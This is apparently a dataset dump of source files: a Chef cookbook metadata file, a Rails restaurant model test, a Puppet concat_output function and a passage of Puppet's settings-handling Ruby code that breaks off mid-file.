hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
28aa0a0dd5f42820e998971bda00eb9250e64394 | 375 | name 'chef-server'
version '3.1.1'
maintainer 'Chef Software, Inc.'
maintainer_email '[email protected]'
license 'Apache 2.0'
description 'Installs and configures Chef Server 12'
source_url 'https://github.com/chef-cookbooks/chef-server'
issues_url 'https://github.com/chef-cookbooks/chef-server/issues'
depends 'chef-server-ingredient'
supports 'centos'
supports 'ubuntu'
| 26.785714 | 65 | 0.784 |
e8829ebdb8ca7f04433b4fcda7caad3ce7517db6 | 1,075 | require 'test_helper'
class RestaurantTest < ActiveSupport::TestCase
setup do
@restaurant = restaurants(:one)
end
test "should create opening_hours" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert_not_empty restaurant.opening_hours
end
test "should have default adress" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert restaurant.address
assert restaurant.zip_code
assert restaurant.city
end
test "should create dishes" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert_not_empty restaurant.dishes
end
test "should create menus" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert_not_empty restaurant.menus
end
test "should create sections" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert_not_empty restaurant.menus
end
test "should create categories" do
restaurant = Restaurant.create name: "Good Pizza", user_id: 1
assert_not_empty restaurant.categories
end
end
| 25.595238 | 65 | 0.736744 |
392721ee9dacdcd021fbb1830fe5a77f04495a2b | 1,048 | #
# Copyright (C) 2012 Onyx Point, Inc. <http://onyxpoint.com/>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module Puppet::Parser::Functions
newfunction(:concat_output, :type => :rvalue, :doc => "Returns the output file for a given concat build.") do |args|
vardirfact = lookupvar('::puppet_vardir')
if vardirfact.nil? || vardirfact == :undefined
clientvardir = Puppet[:vardir]
else
clientvardir = vardirfact
end
"#{clientvardir}/concat/output/#{args.first}.out"
end
end
| 36.137931 | 120 | 0.695611 |
ff88509d78ae169f142c7027e59d8e30f4389992 | 51,891 | require 'puppet'
require 'getoptlong'
require 'puppet/util/watched_file'
require 'puppet/util/command_line/puppet_option_parser'
require 'forwardable'
require 'fileutils'
# The class for handling configuration files.
class Puppet::Settings
extend Forwardable
include Enumerable
require 'puppet/settings/errors'
require 'puppet/settings/base_setting'
require 'puppet/settings/string_setting'
require 'puppet/settings/enum_setting'
require 'puppet/settings/symbolic_enum_setting'
require 'puppet/settings/array_setting'
require 'puppet/settings/file_setting'
require 'puppet/settings/directory_setting'
require 'puppet/settings/file_or_directory_setting'
require 'puppet/settings/path_setting'
require 'puppet/settings/boolean_setting'
require 'puppet/settings/terminus_setting'
require 'puppet/settings/duration_setting'
require 'puppet/settings/ttl_setting'
require 'puppet/settings/priority_setting'
require 'puppet/settings/autosign_setting'
require 'puppet/settings/config_file'
require 'puppet/settings/value_translator'
require 'puppet/settings/environment_conf'
require 'puppet/settings/server_list_setting'
require 'puppet/settings/http_extra_headers_setting'
require 'puppet/settings/certificate_revocation_setting'
# local reference for convenience
PuppetOptionParser = Puppet::Util::CommandLine::PuppetOptionParser
attr_accessor :files
attr_reader :timer
# These are the settings that every app is required to specify; there are
# reasonable defaults defined in application.rb.
REQUIRED_APP_SETTINGS = [:logdir, :confdir, :vardir, :codedir]
# The acceptable sections of the puppet.conf configuration file.
ALLOWED_SECTION_NAMES = ['main', 'master', 'agent', 'user'].freeze
NONE = 'none'.freeze
# This method is intended for puppet internal use only; it is a convenience method that
# returns reasonable application default settings values for a given run_mode.
def self.app_defaults_for_run_mode(run_mode)
{
:name => run_mode.to_s,
:run_mode => run_mode.name,
:confdir => run_mode.conf_dir,
:codedir => run_mode.code_dir,
:vardir => run_mode.var_dir,
:rundir => run_mode.run_dir,
:logdir => run_mode.log_dir,
}
end
def self.default_certname()
hostname = hostname_fact
domain = domain_fact
if domain and domain != ""
fqdn = [hostname, domain].join(".")
else
fqdn = hostname
end
fqdn.to_s.gsub(/\.$/, '')
end
def self.hostname_fact()
Facter.value :hostname
end
def self.domain_fact()
Facter.value :domain
end
def self.default_config_file_name
"puppet.conf"
end
def stringify_settings(section, settings = :all)
values_from_the_selected_section =
values(nil, section.to_sym)
loader_settings = {
:environmentpath => values_from_the_selected_section.interpolate(:environmentpath),
:basemodulepath => values_from_the_selected_section.interpolate(:basemodulepath),
}
Puppet.override(Puppet.base_context(loader_settings),
_("New environment loaders generated from the requested section.")) do
# And now we can lookup values that include those from environments configured from
# the requested section
values = values(Puppet[:environment].to_sym, section.to_sym)
to_be_rendered = {}
settings = Puppet.settings.to_a.collect(&:first) if settings == :all
settings.sort.each do |setting_name|
to_be_rendered[setting_name] = values.print(setting_name.to_sym)
end
stringifyhash(to_be_rendered)
end
end
def stringifyhash(hash)
newhash = {}
hash.each do |key, val|
key = key.to_s
if val.is_a? Hash
newhash[key] = stringifyhash(val)
elsif val.is_a? Symbol
newhash[key] = val.to_s
else
newhash[key] = val
end
end
newhash
end
# Create a new collection of config settings.
def initialize
@config = {}
@shortnames = {}
@created = []
# Keep track of set values.
@value_sets = {
:cli => Values.new(:cli, @config),
:memory => Values.new(:memory, @config),
:application_defaults => Values.new(:application_defaults, @config),
:overridden_defaults => Values.new(:overridden_defaults, @config),
}
@configuration_file = nil
# And keep a per-environment cache
@cache = Hash.new { |hash, key| hash[key] = {} }
@values = Hash.new { |hash, key| hash[key] = {} }
# The list of sections we've used.
@used = []
@hooks_to_call_on_application_initialization = []
@deprecated_setting_names = []
@deprecated_settings_that_have_been_configured = []
@translate = Puppet::Settings::ValueTranslator.new
@config_file_parser = Puppet::Settings::ConfigFile.new(@translate)
end
# Retrieve a config value
# @param param [Symbol] the name of the setting
# @return [Object] the value of the setting
# @api private
def [](param)
if @deprecated_setting_names.include?(param)
issue_deprecation_warning(setting(param), "Accessing '#{param}' as a setting is deprecated.")
end
value(param)
end
# Set a config value. This doesn't set the defaults, it sets the value itself.
# @param param [Symbol] the name of the setting
# @param value [Object] the new value of the setting
# @api private
def []=(param, value)
if @deprecated_setting_names.include?(param)
issue_deprecation_warning(setting(param), "Modifying '#{param}' as a setting is deprecated.")
end
@value_sets[:memory].set(param, value)
unsafe_flush_cache
end
# Create a new default value for the given setting. The default overrides are
# higher precedence than the defaults given in defaults.rb, but lower
# precedence than any other values for the setting. This allows one setting
# `a` to change the default of setting `b`, but still allow a user to provide
# a value for setting `b`.
#
# @param param [Symbol] the name of the setting
# @param value [Object] the new default value for the setting
# @api private
def override_default(param, value)
@value_sets[:overridden_defaults].set(param, value)
unsafe_flush_cache
end
# Generate the list of valid arguments, in a format that GetoptLong can
# understand, and add them to the passed option list.
def addargs(options)
# Add all of the settings as valid options.
self.each { |name, setting|
setting.getopt_args.each { |args| options << args }
}
options
end
# Generate the list of valid arguments, in a format that OptionParser can
# understand, and add them to the passed option list.
def optparse_addargs(options)
# Add all of the settings as valid options.
self.each { |name, setting|
options << setting.optparse_args
}
options
end
# Is our setting a boolean setting?
def boolean?(param)
param = param.to_sym
@config.include?(param) and @config[param].kind_of?(BooleanSetting)
end
# Remove all set values, potentially skipping cli values.
def clear
unsafe_clear
end
# Remove all set values, potentially skipping cli values.
def unsafe_clear(clear_cli = true, clear_application_defaults = false)
if clear_application_defaults
@value_sets[:application_defaults] = Values.new(:application_defaults, @config)
@app_defaults_initialized = false
end
if clear_cli
@value_sets[:cli] = Values.new(:cli, @config)
# Only clear the 'used' values if we were explicitly asked to clear out
# :cli values; otherwise, it may be just a config file reparse,
# and we want to retain this cli values.
@used = []
end
@value_sets[:memory] = Values.new(:memory, @config)
@value_sets[:overridden_defaults] = Values.new(:overridden_defaults, @config)
@deprecated_settings_that_have_been_configured.clear
@values.clear
@cache.clear
end
private :unsafe_clear
# Clears all cached settings for a particular environment to ensure
# that changes to environment.conf are reflected in the settings if
# the environment timeout has expired.
#
# param [String, Symbol] environment the name of environment to clear settings for
#
# @api private
def clear_environment_settings(environment)
if environment.nil?
return
end
@cache[environment.to_sym].clear
@values[environment.to_sym] = {}
end
# Clear @cache, @used and the Environment.
#
# Whenever an object is returned by Settings, a copy is stored in @cache.
# As long as Setting attributes that determine the content of returned
# objects remain unchanged, Settings can keep returning objects from @cache
# without re-fetching or re-generating them.
#
# Whenever a Settings attribute changes, such as @values or @preferred_run_mode,
# this method must be called to clear out the caches so that updated
# objects will be returned.
def flush_cache
unsafe_flush_cache
end
def unsafe_flush_cache
clearused
end
private :unsafe_flush_cache
def clearused
@cache.clear
@used = []
end
def global_defaults_initialized?()
@global_defaults_initialized
end
def initialize_global_settings(args = [], require_config = true)
raise Puppet::DevError, _("Attempting to initialize global default settings more than once!") if global_defaults_initialized?
# The first two phases of the lifecycle of a puppet application are:
# 1) Parse the command line options and handle any of them that are
# registered, defined "global" puppet settings (mostly from defaults.rb).
# 2) Parse the puppet config file(s).
parse_global_options(args)
parse_config_files(require_config)
@global_defaults_initialized = true
end
# This method is called during application bootstrapping. It is responsible for parsing all of the
# command line options and initializing the settings accordingly.
#
# It will ignore options that are not defined in the global puppet settings list, because they may
# be valid options for the specific application that we are about to launch... however, at this point
# in the bootstrapping lifecycle, we don't yet know what that application is.
def parse_global_options(args)
# Create an option parser
option_parser = PuppetOptionParser.new
option_parser.ignore_invalid_options = true
# Add all global options to it.
self.optparse_addargs([]).each do |option|
option_parser.on(*option) do |arg|
opt, val = Puppet::Settings.clean_opt(option[0], arg)
handlearg(opt, val)
end
end
option_parser.on('--run_mode',
"The effective 'run mode' of the application: master, agent, or user.",
:REQUIRED) do |arg|
Puppet.settings.preferred_run_mode = arg
end
option_parser.parse(args)
# remove run_mode options from the arguments so that later parses don't think
# it is an unknown option.
while option_index = args.index('--run_mode') do #rubocop:disable Lint/AssignmentInCondition
args.delete_at option_index
args.delete_at option_index
end
args.reject! { |arg| arg.start_with? '--run_mode=' }
end
private :parse_global_options
# A utility method (public, is used by application.rb and perhaps elsewhere) that munges a command-line
# option string into the format that Puppet.settings expects. (This mostly has to deal with handling the
# "no-" prefix on flag/boolean options).
#
# @param [String] opt the command line option that we are munging
# @param [String, TrueClass, FalseClass] val the value for the setting (as determined by the OptionParser)
def self.clean_opt(opt, val)
# rewrite --[no-]option to --no-option if that's what was given
if opt =~ /\[no-\]/ and !val
opt = opt.gsub(/\[no-\]/,'no-')
end
# otherwise remove the [no-] prefix to not confuse everybody
opt = opt.gsub(/\[no-\]/, '')
[opt, val]
end
def app_defaults_initialized?
@app_defaults_initialized
end
def initialize_app_defaults(app_defaults)
REQUIRED_APP_SETTINGS.each do |key|
raise SettingsError, "missing required app default setting '#{key}'" unless app_defaults.has_key?(key)
end
app_defaults.each do |key, value|
if key == :run_mode
self.preferred_run_mode = value
else
@value_sets[:application_defaults].set(key, value)
unsafe_flush_cache
end
end
apply_metadata
call_hooks_deferred_to_application_initialization
issue_deprecations
REQUIRED_APP_SETTINGS.each do |key|
create_ancestors(Puppet[key])
end
@app_defaults_initialized = true
end
# Create ancestor directories.
#
# @param dir [String] absolute path for a required application default directory
# @api private
def create_ancestors(dir)
parent_dir = File.dirname(dir)
if !File.exist?(parent_dir)
FileUtils.mkdir_p(parent_dir)
end
end
private :create_ancestors
def call_hooks_deferred_to_application_initialization(options = {})
@hooks_to_call_on_application_initialization.each do |setting|
begin
setting.handle(self.value(setting.name))
rescue InterpolationError => err
raise InterpolationError, err.message, err.backtrace unless options[:ignore_interpolation_dependency_errors]
#swallow. We're not concerned if we can't call hooks because dependencies don't exist yet
#we'll get another chance after application defaults are initialized
end
end
end
private :call_hooks_deferred_to_application_initialization
# Return a value's description.
def description(name)
obj = @config[name.to_sym]
if obj
obj.desc
else
nil
end
end
def_delegators :@config, :each, :each_pair, :each_key
# Iterate over each section name.
def eachsection
yielded = []
@config.each_value do |object|
section = object.section
unless yielded.include? section
yield section
yielded << section
end
end
end
# Returns a given setting by name
# @param name [Symbol] The name of the setting to fetch
# @return [Puppet::Settings::BaseSetting] The setting object
def setting(param)
param = param.to_sym
@config[param]
end
# Handle a command-line argument.
def handlearg(opt, value = nil)
@cache.clear
if value.is_a?(FalseClass)
value = "false"
elsif value.is_a?(TrueClass)
value = "true"
end
value &&= @translate[value]
str = opt.sub(/^--/,'')
bool = true
newstr = str.sub(/^no-/, '')
if newstr != str
str = newstr
bool = false
end
str = str.intern
if @config[str].is_a?(Puppet::Settings::BooleanSetting)
if value == "" or value.nil?
value = bool
end
end
s = @config[str]
if s
@deprecated_settings_that_have_been_configured << s if s.completely_deprecated?
end
@value_sets[:cli].set(str, value)
unsafe_flush_cache
end
def include?(name)
name = name.intern if name.is_a? String
@config.include?(name)
end
# Prints the contents of a config file with the available config settings, or it
# prints a single value of a config setting.
def print_config_options
if Puppet::Util::Log.sendlevel?(:info)
Puppet::Util::Log.newdestination(:console)
message = (_("Using --configprint is deprecated. Use 'puppet config <subcommand>' instead."))
Puppet.deprecation_warning(message)
end
env = value(:environment)
val = value(:configprint)
if val == "all"
hash = {}
each do |name, obj|
val = value(name,env)
val = val.inspect if val == ""
hash[name] = val
end
hash.sort { |a,b| a[0].to_s <=> b[0].to_s }.each do |name, v|
puts "#{name} = #{v}"
end
else
val.split(/\s*,\s*/).sort.each do |v|
if include?(v)
#if there is only one value, just print it for back compatibility
if v == val
puts value(val,env)
break
end
puts "#{v} = #{value(v,env)}"
else
puts "invalid setting: #{v}"
return false
end
end
end
true
end
def generate_config
puts to_config
true
end
def generate_manifest
puts to_manifest
true
end
def print_configs
return print_config_options if value(:configprint) != ""
return generate_config if value(:genconfig)
generate_manifest if value(:genmanifest)
end
def print_configs?
(value(:configprint) != "" || value(:genconfig) || value(:genmanifest)) && true
end
# The currently configured run mode that is preferred for constructing the application configuration.
def preferred_run_mode
@preferred_run_mode_name || :user
end
# PRIVATE! This only exists because we need a hook to validate the run mode when it's being set, and
# it should never, ever, ever, ever be called from outside of this file.
# This method is also called when --run_mode MODE is used on the command line to set the default
#
# @param mode [String|Symbol] the name of the mode to have in effect
# @api private
def preferred_run_mode=(mode)
mode = mode.to_s.downcase.intern
raise ValidationError, "Invalid run mode '#{mode}'" unless [:master, :agent, :user].include?(mode)
@preferred_run_mode_name = mode
# Changing the run mode has far-reaching consequences. Flush any cached
# settings so they will be re-generated.
flush_cache
mode
end
def parse_config(text, file = "text")
begin
data = @config_file_parser.parse_file(file, text, ALLOWED_SECTION_NAMES)
rescue => detail
Puppet.log_exception(detail, "Could not parse #{file}: #{detail}")
return
end
# If we get here and don't have any data, we just return and don't muck with the current state of the world.
return if data.nil?
# If we get here then we have some data, so we need to clear out any
# previous settings that may have come from config files.
unsafe_clear(false, false)
# Screen settings which have been deprecated and removed from puppet.conf
# but are still valid on the command line and/or in environment.conf
screen_non_puppet_conf_settings(data)
# Make note of deprecated settings we will warn about later in initialization
record_deprecations_from_puppet_conf(data)
# And now we can repopulate with the values from our last parsing of the config files.
@configuration_file = data
# Determine our environment, if we have one.
if @config[:environment]
env = self.value(:environment).to_sym
else
env = NONE
end
# Call any hooks we should be calling.
value_sets = value_sets_for(env, preferred_run_mode)
@config.values.select(&:has_hook?).each do |setting|
value_sets.each do |source|
if source.include?(setting.name)
# We still have to use value to retrieve the value, since
# we want the fully interpolated value, not $vardir/lib or whatever.
# This results in extra work, but so few of the settings
# will have associated hooks that it ends up being less work this
# way overall.
if setting.call_hook_on_initialize?
@hooks_to_call_on_application_initialization |= [ setting ]
else
setting.handle(ChainedValues.new(
preferred_run_mode,
env,
value_sets,
@config).interpolate(setting.name))
end
break
end
end
end
call_hooks_deferred_to_application_initialization :ignore_interpolation_dependency_errors => true
apply_metadata
end
# Parse the configuration file. Just provides thread safety.
def parse_config_files(require_config = true)
file = which_configuration_file
if Puppet::FileSystem.exist?(file)
begin
text = read_file(file)
rescue => detail
message = _("Could not load %{file}: %{detail}") % { file: file, detail: detail}
if require_config
Puppet.log_and_raise(detail, message)
else
Puppet.log_exception(detail, message)
return
end
end
else
return
end
parse_config(text, file)
end
private :parse_config_files
def main_config_file
if explicit_config_file?
return self[:config]
else
return File.join(Puppet::Util::RunMode[:master].conf_dir, config_file_name)
end
end
private :main_config_file
def user_config_file
return File.join(Puppet::Util::RunMode[:user].conf_dir, config_file_name)
end
private :user_config_file
# This method is here to get around some life-cycle issues. We need to be
# able to determine the config file name before the settings / defaults are
# fully loaded. However, we also need to respect any overrides of this value
# that the user may have specified on the command line.
#
# The easiest way to do this is to attempt to read the setting, and if we
# catch an error (meaning that it hasn't been set yet), we'll fall back to
# the default value.
def config_file_name
begin
return self[:config_file_name] if self[:config_file_name]
rescue SettingsError
# This just means that the setting wasn't explicitly set on the command line, so we will ignore it and
# fall through to the default name.
end
return self.class.default_config_file_name
end
private :config_file_name
def apply_metadata
# We have to do it in the reverse of the search path,
# because multiple sections could set the same value
# and I'm too lazy to only set the metadata once.
if @configuration_file
searchpath(nil, preferred_run_mode).reverse_each do |source|
section = @configuration_file.sections[source.name] if source.type == :section
if section
apply_metadata_from_section(section)
end
end
end
end
private :apply_metadata
def apply_metadata_from_section(section)
section.settings.each do |setting|
type = @config[setting.name] if setting.has_metadata?
if type
type.set_meta(setting.meta)
end
end
end
SETTING_TYPES = {
:string => StringSetting,
:file => FileSetting,
:directory => DirectorySetting,
:file_or_directory => FileOrDirectorySetting,
:path => PathSetting,
:boolean => BooleanSetting,
:terminus => TerminusSetting,
:duration => DurationSetting,
:ttl => TTLSetting,
:array => ArraySetting,
:enum => EnumSetting,
:symbolic_enum => SymbolicEnumSetting,
:priority => PrioritySetting,
:autosign => AutosignSetting,
:server_list => ServerListSetting,
:http_extra_headers => HttpExtraHeadersSetting,
:certificate_revocation => CertificateRevocationSetting
}
# Create a new setting. The value is passed in because it's used to determine
# what kind of setting we're creating, but the value itself might be either
# a default or a value, so we can't actually assign it.
#
# See #define_settings for documentation on the legal values for the ":type" option.
def newsetting(hash)
klass = nil
hash[:section] = hash[:section].to_sym if hash[:section]
type = hash[:type]
if type
klass = SETTING_TYPES[type]
unless klass
raise ArgumentError, _("Invalid setting type '%{type}'") % { type: type }
end
hash.delete(:type)
else
# The only implicit typing we still do for settings is to fall back to "String" type if they didn't explicitly
# specify a type. Personally I'd like to get rid of this too, and make the "type" option mandatory... but
# there was a little resistance to taking things quite that far for now. --cprice 2012-03-19
klass = StringSetting
end
hash[:settings] = self
setting = klass.new(hash)
setting
end
# This has to be private, because it doesn't add the settings to @config
private :newsetting
# Iterate across all of the objects in a given section.
def persection(section)
section = section.to_sym
self.each { |name, obj|
if obj.section == section
yield obj
end
}
end
# Reparse our config file, if necessary.
def reparse_config_files
if files
filename = any_files_changed?
if filename
Puppet.notice "Config file #{filename} changed; triggering re-parse of all config files."
parse_config_files
reuse
end
end
end
def files
return @files if @files
@files = []
[main_config_file, user_config_file].each do |path|
if Puppet::FileSystem.exist?(path)
@files << Puppet::Util::WatchedFile.new(path)
end
end
@files
end
private :files
# Checks to see if any of the config files have been modified
# @return the filename of the first file that is found to have changed, or
# nil if no files have changed
def any_files_changed?
files.each do |file|
return file.to_str if file.changed?
end
nil
end
private :any_files_changed?
def reuse
return unless defined?(@used)
new = @used
@used = []
self.use(*new)
end
class SearchPathElement < Struct.new(:name, :type); end
# The order in which to search for values, without defaults.
#
# @param environment [String,Symbol] symbolic reference to an environment name
# @param run_mode [Symbol] symbolic reference to a Puppet run mode
# @return [Array<SearchPathElement>]
# @api private
def configsearchpath(environment = nil, run_mode = preferred_run_mode)
searchpath = [
SearchPathElement.new(:memory, :values),
SearchPathElement.new(:cli, :values),
]
searchpath << SearchPathElement.new(environment.intern, :environment) if environment
searchpath << SearchPathElement.new(run_mode, :section) if run_mode
searchpath << SearchPathElement.new(:main, :section)
end
# The order in which to search for values.
#
# @param environment [String,Symbol] symbolic reference to an environment name
# @param run_mode [Symbol] symbolic reference to a Puppet run mode
# @return [Array<SearchPathElement>]
# @api private
def searchpath(environment = nil, run_mode = preferred_run_mode)
searchpath = configsearchpath(environment, run_mode)
searchpath << SearchPathElement.new(:application_defaults, :values)
searchpath << SearchPathElement.new(:overridden_defaults, :values)
end
def service_user_available?
return @service_user_available if defined?(@service_user_available)
if self[:user]
user = Puppet::Type.type(:user).new :name => self[:user], :audit => :ensure
@service_user_available = user.exists?
else
@service_user_available = false
end
end
def service_group_available?
return @service_group_available if defined?(@service_group_available)
if self[:group]
group = Puppet::Type.type(:group).new :name => self[:group], :audit => :ensure
@service_group_available = group.exists?
else
@service_group_available = false
end
end
# Allow later inspection to determine if the setting was set on the
# command line, or through some other code path. Used for the
# `dns_alt_names` option during cert generate. --daniel 2011-10-18
def set_by_cli?(param)
param = param.to_sym
!@value_sets[:cli].lookup(param).nil?
end
# Get values from a search path entry.
# @api private
def searchpath_values(source)
case source.type
when :values
@value_sets[source.name]
when :section
section = @configuration_file.sections[source.name] if @configuration_file
if section
ValuesFromSection.new(source.name, section)
end
when :environment
ValuesFromEnvironmentConf.new(source.name)
else
raise Puppet::DevError, _("Unknown searchpath case: %{source_type} for the %{source} settings path element.") % { source_type: source.type, source: source}
end
end
# Allow later inspection to determine if the setting was set by user
# config, rather than a default setting.
def set_by_config?(param, environment = nil, run_mode = preferred_run_mode)
param = param.to_sym
configsearchpath(environment, run_mode).any? do |source|
vals = searchpath_values(source)
if vals
vals.lookup(param)
end
end
end
# Patches the value for a param in a section.
# This method is required to support the use case of unifying --dns-alt-names and
# --dns_alt_names in the certificate face. Ideally this should be cleaned up.
# See PUP-3684 for more information.
# For regular use of setting a value, the method `[]=` should be used.
# @api private
#
def patch_value(param, value, type)
if @value_sets[type]
@value_sets[type].set(param, value)
unsafe_flush_cache
end
end
# Define a group of settings.
#
# @param [Symbol] section a symbol to use for grouping multiple settings together into a conceptual unit. This value
# (and the conceptual separation) is not used very often; the main place where it will have a potential impact
# is when code calls Settings#use method. See docs on that method for further details, but basically that method
# just attempts to do any preparation that may be necessary before code attempts to leverage the value of a particular
# setting. This has the most impact for file/directory settings, where #use will attempt to "ensure" those
# files / directories.
# @param [Hash[Hash]] defs the settings to be defined. This argument is a hash of hashes; each key should be a symbol,
# which is basically the name of the setting that you are defining. The value should be another hash that specifies
# the parameters for the particular setting. Legal values include:
# [:default] => not required; this is the value for the setting if no other value is specified (via cli, config file, etc.)
# For string settings this may include "variables", demarcated with $ or ${} which will be interpolated with values of other settings.
# The default value may also be a Proc that will be called only once to evaluate the default when the setting's value is retrieved.
# [:desc] => required; a description of the setting, used in documentation / help generation
# [:type] => not required, but highly encouraged! This specifies the data type that the setting represents. If
# you do not specify it, it will default to "string". Legal values include:
# :string - A generic string setting
# :boolean - A boolean setting; values are expected to be "true" or "false"
# :file - A (single) file path; puppet may attempt to create this file depending on how the settings are used. This type
# also supports additional options such as "mode", "owner", "group"
# :directory - A (single) directory path; puppet may attempt to create this file depending on how the settings are used. This type
# also supports additional options such as "mode", "owner", "group"
# :path - This is intended to be used for settings whose value can contain multiple directory paths, represented
# as strings separated by the system path separator (e.g. system path, module path, etc.).
# [:mode] => an (optional) octal value to be used as the permissions/mode for :file and :directory settings
# [:owner] => optional owner username/uid for :file and :directory settings
# [:group] => optional group name/gid for :file and :directory settings
#
def define_settings(section, defs)
section = section.to_sym
call = []
defs.each do |name, hash|
raise ArgumentError, _("setting definition for '%{name}' is not a hash!") % { name: name } unless hash.is_a? Hash
name = name.to_sym
hash[:name] = name
hash[:section] = section
raise ArgumentError, _("Setting %{name} is already defined") % { name: name } if @config.include?(name)
tryconfig = newsetting(hash)
short = tryconfig.short
if short
other = @shortnames[short]
if other
raise ArgumentError, _("Setting %{name} is already using short name '%{short}'") % { name: other.name, short: short }
end
@shortnames[short] = tryconfig
end
@config[name] = tryconfig
# Collect the settings that need to have their hooks called immediately.
# We have to collect them so that we can be sure we're fully initialized before
# the hook is called.
if tryconfig.has_hook?
if tryconfig.call_hook_on_define?
call << tryconfig
elsif tryconfig.call_hook_on_initialize?
@hooks_to_call_on_application_initialization |= [ tryconfig ]
end
end
@deprecated_setting_names << name if tryconfig.deprecated?
end
call.each do |setting|
setting.handle(self.value(setting.name))
end
end
# Convert the settings we manage into a catalog full of resources that model those settings.
def to_catalog(*sections)
sections = nil if sections.empty?
catalog = Puppet::Resource::Catalog.new("Settings", Puppet::Node::Environment::NONE)
@config.keys.find_all { |key| @config[key].is_a?(FileSetting) }.each do |key|
file = @config[key]
next if file.value.nil?
next unless (sections.nil? or sections.include?(file.section))
resource = file.to_resource
next unless resource
next if catalog.resource(resource.ref)
Puppet.debug {"Using settings: adding file resource '#{key}': '#{resource.inspect}'"}
catalog.add_resource(resource)
end
add_user_resources(catalog, sections)
add_environment_resources(catalog, sections)
catalog
end
# Convert our list of config settings into a configuration file.
def to_config
str = %{The configuration file for #{Puppet.run_mode.name}. Note that this file
is likely to have unused settings in it; any setting that's
valid anywhere in Puppet can be in any config file, even if it's not used.
Every section can specify three special parameters: owner, group, and mode.
These parameters affect the required permissions of any files specified after
their specification. Puppet will sometimes use these parameters to check its
own configured state, so they can be used to make Puppet a bit more self-managing.
The file format supports octothorpe-commented lines, but not partial-line comments.
Generated on #{Time.now}.
}.gsub(/^/, "# ")
# Add a section heading that matches our name.
str += "[#{preferred_run_mode}]\n"
eachsection do |section|
persection(section) do |obj|
str += obj.to_config + "\n" unless obj.name == :genconfig
end
end
return str
end
# Convert to a parseable manifest
def to_manifest
catalog = to_catalog
catalog.resource_refs.collect do |ref|
catalog.resource(ref).to_manifest
end.join("\n\n")
end
# Create the necessary objects to use a section. This is idempotent;
# you can 'use' a section as many times as you want.
def use(*sections)
sections = sections.collect { |s| s.to_sym }
sections = sections.reject { |s| @used.include?(s) }
return if sections.empty?
Puppet.debug("Applying settings catalog for sections #{sections.join(', ')}")
begin
catalog = to_catalog(*sections).to_ral
rescue => detail
Puppet.log_and_raise(detail, "Could not create resources for managing Puppet's files and directories in sections #{sections.inspect}: #{detail}")
end
catalog.host_config = false
catalog.apply do |transaction|
if transaction.any_failed?
report = transaction.report
status_failures = report.resource_statuses.values.select { |r| r.failed? }
status_fail_msg = status_failures.
collect(&:events).
flatten.
select { |event| event.status == 'failure' }.
collect { |event| "#{event.resource}: #{event.message}" }.join("; ")
raise "Got #{status_failures.length} failure(s) while initializing: #{status_fail_msg}"
end
end
sections.each { |s| @used << s }
@used.uniq!
end
def valid?(param)
param = param.to_sym
@config.has_key?(param)
end
# Retrieve an object that can be used for looking up values of configuration
# settings.
#
# @param environment [Symbol] The name of the environment in which to lookup
# @param section [Symbol] The name of the configuration section in which to lookup
# @return [Puppet::Settings::ChainedValues] An object to perform lookups
# @api public
def values(environment, section)
@values[environment][section] ||= ChainedValues.new(
section,
environment,
value_sets_for(environment, section),
@config)
end
# Find the correct value using our search path.
#
# @param param [String, Symbol] The value to look up
# @param environment [String, Symbol] The environment to check for the value
# @param bypass_interpolation [true, false] Whether to skip interpolation
#
# @return [Object] The looked up value
#
# @raise [InterpolationError]
def value(param, environment = nil, bypass_interpolation = false)
environment &&= environment.to_sym
value_sym(param.to_sym, environment, bypass_interpolation)
end
# Find the correct value using symbols and our search path.
#
# @param param [Symbol] The value to look up
# @param environment [Symbol] The environment to check for the value
# @param bypass_interpolation [true, false] Whether to skip interpolation
#
# @return [Object] The looked up value
#
# @raise [InterpolationError]
def value_sym(param, environment = nil, bypass_interpolation = false)
# Check the cache first. It needs to be a per-environment
# cache so that we don't spread values from one env
# to another.
cached_env = @cache[environment || NONE]
# Avoid two lookups in cache_env unless val is nil. When it is, it's important
# to check if the key is included so that further processing (that will result
# in nil again) is avoided.
val = cached_env[param]
return val if !val.nil? || cached_env.include?(param)
# Short circuit to nil for undefined settings.
return nil unless @config.include?(param)
vals = values(environment, preferred_run_mode)
val = bypass_interpolation ? vals.lookup(param) : vals.interpolate(param)
cached_env[param] = val
val
end
##
# (#15337) All of the logic to determine the configuration file to use
# should be centralized into this method. The simplified approach is:
#
# 1. If there is an explicit configuration file, use that. (--confdir or
# --config)
# 2. If we're running as a root process, use the system puppet.conf
# (usually /etc/puppetlabs/puppet/puppet.conf)
# 3. Otherwise, use the user puppet.conf (usually ~/.puppetlabs/etc/puppet/puppet.conf)
#
# @api private
# @todo this code duplicates {Puppet::Util::RunMode#which_dir} as described
# in {https://projects.puppetlabs.com/issues/16637 #16637}
def which_configuration_file
if explicit_config_file? or Puppet.features.root? then
return main_config_file
else
return user_config_file
end
end
# This method just turns a file into a new ConfigFile::Conf instance
# @param file [String] absolute path to the configuration file
# @return [Puppet::Settings::ConfigFile::Conf]
# @api private
def parse_file(file, allowed_sections = [])
@config_file_parser.parse_file(file, read_file(file), allowed_sections)
end
private
DEPRECATION_REFS = {
# intentionally empty. This could be repopulated if we deprecate more settings
# and have reference links to associate with them
}.freeze
def screen_non_puppet_conf_settings(puppet_conf)
puppet_conf.sections.values.each do |section|
forbidden = section.settings.select { |setting| Puppet::Settings::EnvironmentConf::ENVIRONMENT_CONF_ONLY_SETTINGS.include?(setting.name) }
raise(SettingsError, "Cannot set #{forbidden.map { |s| s.name }.join(", ")} settings in puppet.conf") if !forbidden.empty?
end
end
# Record that we want to issue a deprecation warning later in the application
# initialization cycle when we have settings bootstrapped to the point where
# we can read the Puppet[:disable_warnings] setting.
#
# We are only recording warnings applicable to settings set in puppet.conf
# itself.
